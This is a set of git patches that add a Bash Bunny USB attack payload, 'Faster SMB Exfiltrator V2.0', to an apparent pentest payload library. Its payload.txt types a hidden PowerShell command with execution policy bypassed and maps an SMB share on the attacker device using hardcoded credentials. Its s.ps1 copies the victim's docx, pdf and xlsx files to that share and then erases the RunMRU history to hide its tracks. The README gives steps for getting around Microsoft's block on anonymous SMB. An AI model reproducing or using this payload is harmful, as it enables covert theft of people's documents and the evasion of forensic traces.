From e98de70531869902c3479243481befaef5fcb60a Mon Sep 17 00:00:00 2001 From: jblk01 Date: Mon, 22 Jul 2019 23:44:48 -0500 Subject: [PATCH 1/7] Create file.txt --- payloads/library/exfiltration/smb_exfiltratorV2.0/file.txt | 1 + 1 file changed, 1 insertion(+) create mode 100644 payloads/library/exfiltration/smb_exfiltratorV2.0/file.txt diff --git a/payloads/library/exfiltration/smb_exfiltratorV2.0/file.txt b/payloads/library/exfiltration/smb_exfiltratorV2.0/file.txt new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/payloads/library/exfiltration/smb_exfiltratorV2.0/file.txt @@ -0,0 +1 @@ + From 5bc816094644b5cfd0b64f814ac519e94673dbe5 Mon Sep 17 00:00:00 2001 From: jblk01 Date: Mon, 22 Jul 2019 23:45:41 -0500 Subject: [PATCH 2/7] Add files via upload --- .../smb_exfiltratorV2.0/README.md | 59 +++++++++++++ .../smb_exfiltratorV2.0/payload.txt | 85 +++++++++++++++++++ .../exfiltration/smb_exfiltratorV2.0/s.ps1 | 9 ++ 3 files changed, 153 insertions(+) create mode 100644 payloads/library/exfiltration/smb_exfiltratorV2.0/README.md create mode 100644 payloads/library/exfiltration/smb_exfiltratorV2.0/payload.txt create mode 100644 payloads/library/exfiltration/smb_exfiltratorV2.0/s.ps1 diff --git a/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md b/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md new file mode 100644 index 00000000..14549d41 --- /dev/null +++ b/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md @@ -0,0 +1,59 @@ +# Faster SMB Exfiltrator V 2.0 + +* Author: Hak5Darren +* Props: ImNatho, mike111b, madbuda, jblk01 +* Version: Version 1.6.1 +* Target: Windows XP SP3+ (Powershell) +* Category: Exfiltration +* Attackmodes: HID, Ethernet + +## Description + +Exfiltrates select files from users's documents folder via SMB. +Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME/DATE_TIME + +Rewrite of the original SMB Exfiltrator payload with: +* Faster copying, using robocopy multithreaded mode +* Faster finish, using a EXFILTRATION_COMPLETE file +* Offload logic to target PC for accurate date/time +* Clears tracks by default. +* Test-Connection handling by ICMP (no lame sleeps) +* Hidden powershell window by default + + +## Configuration + +Configured to copy docx, pdf, and xlsx files by default. Change $exfil_ext# in s.ps1 to desired. + +## STATUS + +| LED | Status | +| ------------------- | -------------------------------------- | +| Red (blinking) | Impacket not found in /pentest | +| Yellow Single | Ethernet Stage | +| Yellow Double | HID Stage | +| Cyan | Receiving files | +| White | Moving liberated files to mass storage | +| Green | Finished | + +## NOTICE + +# As of May 2019, Microsoft has disabled both SMB version 2 along with disallowing anonymous access to an SMB share. +# To fix this, first follow these instructions, then you may use both the payload.txt and the s.ps1 files. + +## Starting from a fresh Bash Bunny + +# 1. apt update ; apt install gcc +# 2. pip install impacket +# 3. cd /tools/ +# 4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz +# 5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/ +# 6. python impacket/examples/smbserver - ## You should see entries for both a '-username' and a '-password' + +# Both the username and the password have been set as 'user' and 'Password01' respectively. + +# Changes to the payload.txt include: + + # Support for SMB version 2 enabled. + # Username and password set to bypass Microsoft's disallowing of anonymous access. + # Authentication to said SMB share with credentials specified in both the payload.txt and s.ps1 files. diff --git a/payloads/library/exfiltration/smb_exfiltratorV2.0/payload.txt b/payloads/library/exfiltration/smb_exfiltratorV2.0/payload.txt new file mode 100644 index 00000000..774900ae --- /dev/null +++ b/payloads/library/exfiltration/smb_exfiltratorV2.0/payload.txt @@ -0,0 +1,85 @@ +#!/bin/bash +# +# Title: Faster SMB Exfiltrator version 2.0 +# Author: Hak5Darren +# Props: ImNatho, mike111b, madbuda, jblk01 +# Version: 1.6.1 +# Category: Exfiltration +# Target: Windows XP SP3+ (Powershell) +# Attackmodes: HID, Ethernet +# +# REQUIREMENTS +# ============ +# SETUP: +# +# 1. apt update ; apt install gcc +# 2. pip install impacket +# 3. cd /tools/ +# 4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz +# 5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/ +# +# +# LED STATUS +# ========== +# FAIL........Failed to find dependencies +# STAGE1......Ethernet Stage +# STAGE2......HID Stage +# SPECIAL.....Receiving Files +# CLEANUP.....Moving Liberated Files +# FINISH......Finished +# +# OPTIONS +# ======= +# Exfiltration options configured from included s.ps1 script + + +######## INITIALIZATION ######## +REQUIRETOOL impacket +GET SWITCH_POSITION +# Make temporary loot directory +mkdir -p /loot/smb/ +# Delete any old exfiltration data +rm -rf /loot/smb/* +# Copy new powershell payload to smb share +cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/ +# Make loot directory on USB Disk +mkdir -p /root/udisk/loot/smb_exfiltrator + + +######## ETHERNET STAGE ######## +LED STAGE1 +ATTACKMODE RNDIS_ETHERNET +# Start the SMB Server +python /tools/impacket/examples/smbserver.py -username user -password Password01 -smb2support -comment '1337' s /loot/smb >> /loot/smbserver.log & + + +######## HID STAGE ######## +# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 +GET HOST_IP +LED STAGE2 +ATTACKMODE HID RNDIS_ETHERNET +RUN WIN powershell +Q DELAY 1000 +Q STRING powershell -windowstyle hidden -exec bypass "net use \\\\$HOST_IP\\s /u:user Password01; powershell -windowstyle hidden -exec bypass \\\\$HOST_IP\\s\\s.ps1; exit" +Q DELAY 500 +Q ENTER +LED SPECIAL +# Wait until files are done copying +while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done + + +######## CLEANUP ######## +LED CLEANUP +# Delete EXFILTRATION_COMPLETE file +rm -rf /loot/smb/EXFILTRATION_COMPLETE +# Move files to udisk loot directory +mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator +# Clean up temporary loot directory +rm -rf /loot/smb/e/* +# Sync file system +sync + + +######## FINISH ######## +# Trap is clean +LED FINISH diff --git a/payloads/library/exfiltration/smb_exfiltratorV2.0/s.ps1 b/payloads/library/exfiltration/smb_exfiltratorV2.0/s.ps1 new file mode 100644 index 00000000..73f1c999 --- /dev/null +++ b/payloads/library/exfiltration/smb_exfiltratorV2.0/s.ps1 @@ -0,0 +1,9 @@ +$exfil_dir="$Env:UserProfile\Documents" +$exfil_ext="*.docx" +$exfil_ext1="*.pdf" +$exfil_ext2="*.xlsx" +$loot_dir="\\172.16.64.1\s\e\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))" +mkdir $loot_dir +robocopy $exfil_dir $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 /S /MT /Z +New-Item -Path \\172.16.64.1\s -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE" +Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue From 4ac760772ac3894e9642ad637fafb9955146e911 Mon Sep 17 00:00:00 2001 From: jblk01 Date: Mon, 22 Jul 2019 23:46:12 -0500 Subject: [PATCH 3/7] Delete file.txt --- payloads/library/exfiltration/smb_exfiltratorV2.0/file.txt | 1 - 1 file changed, 1 deletion(-) delete mode 100644 payloads/library/exfiltration/smb_exfiltratorV2.0/file.txt diff --git a/payloads/library/exfiltration/smb_exfiltratorV2.0/file.txt b/payloads/library/exfiltration/smb_exfiltratorV2.0/file.txt deleted file mode 100644 index 8b137891..00000000 --- a/payloads/library/exfiltration/smb_exfiltratorV2.0/file.txt +++ /dev/null @@ -1 +0,0 @@ - From 90ad58048504d2de20d792fc516ed1a36090176e Mon Sep 17 00:00:00 2001 From: jblk01 Date: Mon, 22 Jul 2019 23:47:36 -0500 Subject: [PATCH 4/7] Update README.md --- .../smb_exfiltratorV2.0/README.md | 28 +++++++++---------- 1 file changed, 14 insertions(+), 14 deletions(-) diff --git a/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md b/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md index 14549d41..106e8d26 100644 --- a/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md +++ b/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md @@ -36,24 +36,24 @@ Configured to copy docx, pdf, and xlsx files by default. Change $exfil_ext# in s | White | Moving liberated files to mass storage | | Green | Finished | -## NOTICE +# NOTICE -# As of May 2019, Microsoft has disabled both SMB version 2 along with disallowing anonymous access to an SMB share. -# To fix this, first follow these instructions, then you may use both the payload.txt and the s.ps1 files. +As of May 2019, Microsoft has disabled both SMB version 2 along with disallowing anonymous access to an SMB share. +To fix this, first follow these instructions, then you may use both the payload.txt and the s.ps1 files. -## Starting from a fresh Bash Bunny +# Starting from a fresh Bash Bunny -# 1. apt update ; apt install gcc -# 2. pip install impacket -# 3. cd /tools/ -# 4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz -# 5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/ -# 6. python impacket/examples/smbserver - ## You should see entries for both a '-username' and a '-password' +1. apt update ; apt install gcc +2. pip install impacket +3. cd /tools/ +4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz +5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/ +6. python impacket/examples/smbserver - ## You should see entries for both a '-username' and a '-password' -# Both the username and the password have been set as 'user' and 'Password01' respectively. +Both the username and the password have been set as 'user' and 'Password01' respectively. # Changes to the payload.txt include: - # Support for SMB version 2 enabled. - # Username and password set to bypass Microsoft's disallowing of anonymous access. - # Authentication to said SMB share with credentials specified in both the payload.txt and s.ps1 files. + Support for SMB version 2 enabled. + Username and password set to bypass Microsoft's disallowing of anonymous access. + Authentication to said SMB share with credentials specified in both the payload.txt and s.ps1 files. From ffce9e1931ab4d5b5ef01672581caef4bf11691f Mon Sep 17 00:00:00 2001 From: jblk01 Date: Mon, 22 Jul 2019 23:48:15 -0500 Subject: [PATCH 5/7] Update README.md --- payloads/library/exfiltration/smb_exfiltratorV2.0/README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md b/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md index 106e8d26..f6c64d8e 100644 --- a/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md +++ b/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md @@ -54,6 +54,6 @@ Both the username and the password have been set as 'user' and 'Password01' resp # Changes to the payload.txt include: - Support for SMB version 2 enabled. - Username and password set to bypass Microsoft's disallowing of anonymous access. - Authentication to said SMB share with credentials specified in both the payload.txt and s.ps1 files. +* Support for SMB version 2 enabled. +* Username and password set to bypass Microsoft's disallowing of anonymous access. +* Authentication to said SMB share with credentials specified in both the payload.txt and s.ps1 files. From e8ab62c9e87246d8c33d7081ae7f88b26d3ffaf8 Mon Sep 17 00:00:00 2001 From: jblk01 Date: Tue, 23 Jul 2019 00:02:09 -0500 Subject: [PATCH 6/7] Update README.md --- payloads/library/exfiltration/smb_exfiltratorV2.0/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md b/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md index f6c64d8e..55cea46d 100644 --- a/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md +++ b/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md @@ -13,11 +13,11 @@ Exfiltrates select files from users's documents folder via SMB. Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME/DATE_TIME Rewrite of the original SMB Exfiltrator payload with: + * Faster copying, using robocopy multithreaded mode * Faster finish, using a EXFILTRATION_COMPLETE file * Offload logic to target PC for accurate date/time -* Clears tracks by default. -* Test-Connection handling by ICMP (no lame sleeps) +* Clears tracks by default * Hidden powershell window by default From 2c41f79fb696c3265b500cf56427c4637f463a95 Mon Sep 17 00:00:00 2001 From: jblk01 Date: Tue, 23 Jul 2019 00:03:18 -0500 Subject: [PATCH 7/7] Update README.md --- .../library/exfiltration/smb_exfiltratorV2.0/README.md | 9 --------- 1 file changed, 9 deletions(-) diff --git a/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md b/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md index 55cea46d..3e103569 100644 --- a/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md +++ b/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md @@ -12,15 +12,6 @@ Exfiltrates select files from users's documents folder via SMB. Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME/DATE_TIME -Rewrite of the original SMB Exfiltrator payload with: - -* Faster copying, using robocopy multithreaded mode -* Faster finish, using a EXFILTRATION_COMPLETE file -* Offload logic to target PC for accurate date/time -* Clears tracks by default -* Hidden powershell window by default - - ## Configuration Configured to copy docx, pdf, and xlsx files by default. Change $exfil_ext# in s.ps1 to desired.